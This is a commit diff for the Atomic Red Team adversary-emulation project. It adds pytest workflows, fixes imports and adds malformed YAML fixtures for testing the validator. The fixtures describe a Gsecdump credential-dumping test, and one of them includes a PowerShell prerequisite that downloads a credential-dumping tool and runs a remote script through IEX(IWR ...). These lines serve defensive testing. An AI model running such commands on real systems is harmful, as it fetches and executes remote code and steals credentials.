Add tests for python code (#2759)

* add tests for python code

* ruff format

.github/workflows/generate-docs.yml

@@ -11,6 +11,35 @@ jobs:
         uses: actions/checkout@v4
         with:
           token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
+
+      - name: Install poetry
+        run: pipx install poetry
+      - uses: actions/setup-python@v5
+        with:
+          python-version: "3.11.2"
+          cache: "poetry"
+      - name: Install dependencies
+        run: poetry install --no-interaction
+
+      - name: Generate shields.io URL
+        run: poetry run python runner.py generate-counter
+        id: counter
+        working-directory: atomic_red_team
+        env:
+          PYTHONPATH: ${{ github.workspace }}
+
+      - name: Update README
+        run: |
+          echo ${{ steps.counter.outputs.result }}
+          sed -i "s|https://img.shields.io/badge/Atomics-.*-flat.svg|${{ steps.counter.outputs.result }}|" README.md
+        shell: bash
+
+      - name: Generate and commit unique GUIDs for each atomic test
+        run: poetry run python runner.py generate-guids
+        working-directory: atomic_red_team
+        env:
+          PYTHONPATH: ${{ github.workspace }}
+
       - name: setup ruby
         uses: ruby/setup-ruby@v1
         with:
@@ -33,6 +62,7 @@ jobs:
             git config credential.helper 'cache --timeout=120'
             git config user.email "[email protected]"
             git config user.name "Atomic Red Team doc generator"
+            git add README.md
             git add atomics
             git commit -am "Generated docs from job=$GITHUB_JOB branch=$GITHUB_REF_NAME [ci skip]"
             git push origin $GITHUB_REF_NAME -f

.github/workflows/run-python-tests.yml

@@ -0,0 +1,29 @@
+name: validate-python-file-changes
+
+on:
+  pull_request:
+    branches:
+      - master
+    paths:
+      - "atomic_red_team/**/*.py"
+
+jobs:
+  validate-python-file-changes:
+    runs-on: ubuntu-latest
+    steps:
+      - name: checkout repo
+        uses: actions/checkout@v4
+      - name: Install poetry
+        run: pipx install poetry
+      - name: setup python3.11
+        uses: actions/setup-python@v5
+        id: setup-python
+        with:
+          python-version: "3.11.2"
+          cache: "poetry"
+
+      - name: Install dependencies
+        run: poetry install --no-interaction
+
+      - name: Run pytest
+        run: poetry run pytest atomic_red_team/tests

.github/workflows/validate-atomics.yml

@@ -21,10 +21,13 @@ jobs:
           cache: "poetry"
 
       - name: Install dependencies
-        run: poetry install --no-interaction --no-root
+        run: poetry install --no-interaction
 
       - name: validate the format of atomics tests against the spec
-        run: poetry run python atomic_red_team/runner.py validate
+        run: poetry run python runner.py validate
+        working-directory: atomic_red_team
+        env:
+          PYTHONPATH: ${{ github.workspace }}
 
   upload:
     runs-on: ubuntu-latest
@@ -61,8 +64,11 @@ jobs:
         run: poetry install --no-interaction --no-root
       - name: save labels and reviewers into a file.
         run: |
-          poetry run python atomic_red_team/runner.py generate-labels --pr '${{steps.get_pr_number.outputs.result}}' --token ${{ secrets.GITHUB_TOKEN }}
+          poetry run python runner.py generate-labels --pr '${{steps.get_pr_number.outputs.result}}' --token ${{ secrets.GITHUB_TOKEN }}
+        working-directory: atomic_red_team
+        env:
+          PYTHONPATH: ${{ github.workspace }}
       - uses: actions/upload-artifact@v4
         with:
           name: labels.json
-          path: pr/
+          path: pr/

atomic_red_team/guid.py

@@ -4,7 +4,7 @@
 
 from ruamel.yaml import YAML
 
-from common import used_guids_file
+from atomic_red_team.common import used_guids_file
 
 yaml = YAML(typ="safe")
 

atomic_red_team/runner.py

@@ -10,14 +10,14 @@
 import typer
 from pydantic import ValidationError
 
-from common import used_guids_file, atomics_path
-from guid import (
+from atomic_red_team.common import used_guids_file, atomics_path
+from atomic_red_team.guid import (
     generate_guids_for_yaml,
     get_unique_guid,
 )
-from labels import GithubAPI
-from models import Technique
-from validator import Validator, format_validation_error, yaml
+from atomic_red_team.labels import GithubAPI
+from atomic_red_team.models import Technique
+from atomic_red_team.validator import Validator, format_validation_error, yaml
 
 app = typer.Typer(help="Atomic Red Team Maintenance tool CLI helper")
 

atomic_red_team/test_data/float_type.yaml

@@ -0,0 +1,18 @@
+attack_technique: T1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    gsecdump_exe:
+      description: Path to the Gsecdump executable
+      type: float
+      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt

atomic_red_team/test_data/int_type.yaml

@@ -0,0 +1,18 @@
+attack_technique: T1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    gsecdump_exe:
+      description: Path to the Gsecdump executable
+      type: integer
+      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt

atomic_red_team/test_data/invalid_filename.yml

@@ -0,0 +1,39 @@
+attack_technique: T1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    gsecdump_exe:
+      description: Path to the Gsecdump executable
+      type: path
+      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
+    gsecdump_bin_hash:
+      description: File hash of the Gsecdump binary file
+      type: string
+      default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
+    gsecdump_url:
+      description: Path to download Gsecdump binary file
+      type: url
+      default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Gsecdump must exist on disk at specified location (#{gsecdump_exe})
+    prereq_command: |
+      if (Test-Path "#{gsecdump_exe}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
+      IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
+      if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
+        Move-Item $binpath "#{gsecdump_exe}"
+      }
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt
+    elevation_required: true

atomic_red_team/test_data/missing_input_argument.yaml

@@ -0,0 +1,13 @@
+attack_technique: T1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt

atomic_red_team/test_data/reused_guid.yaml

@@ -0,0 +1,35 @@
+attack_technique: T1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    gsecdump_exe:
+      description: Path to the Gsecdump executable
+      type: path
+      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt
+    elevation_required: true
+- name: Gsecdump
+  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    gsecdump_exe:
+      description: Path to the Gsecdump executable
+      type: path
+      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
+  dependency_executor_name: powershell
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt

atomic_red_team/test_data/string_pattern_mismatch.yaml

@@ -0,0 +1,13 @@
+attack_technique: W1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      echo "ART"
+    name: command_prompt

atomic_red_team/test_data/string_too_short.yaml

@@ -0,0 +1,18 @@
+attack_technique: T1003
+display_name: OS
+atomic_tests:
+- name: Gsecdump
+  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    gsecdump_exe:
+      description: Path to the Gsecdump executable
+      type: path
+      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt

atomic_red_team/test_data/unused_input_argument.yaml

@@ -0,0 +1,27 @@
+attack_technique: T1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    gsecdump_exe:
+      description: Path to the Gsecdump executable
+      type: path
+      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
+    gsecdump_bin_hash:
+      description: File hash of the Gsecdump binary file
+      type: string
+      default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
+    gsecdump_url:
+      description: Path to download Gsecdump binary file
+      type: url
+      default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
+  dependency_executor_name: powershell
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt

atomic_red_team/test_data/url_parsing.yaml

@@ -0,0 +1,18 @@
+attack_technique: T1003
+display_name: OS Credential Dumping
+atomic_tests:
+- name: Gsecdump
+  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+  description: |
+    Dump credentials from memory using Gsecdump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    gsecdump_exe:
+      description: Path to the Gsecdump executable
+      type: url
+      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
+  executor:
+    command: |
+      "#{gsecdump_exe}" -a
+    name: command_prompt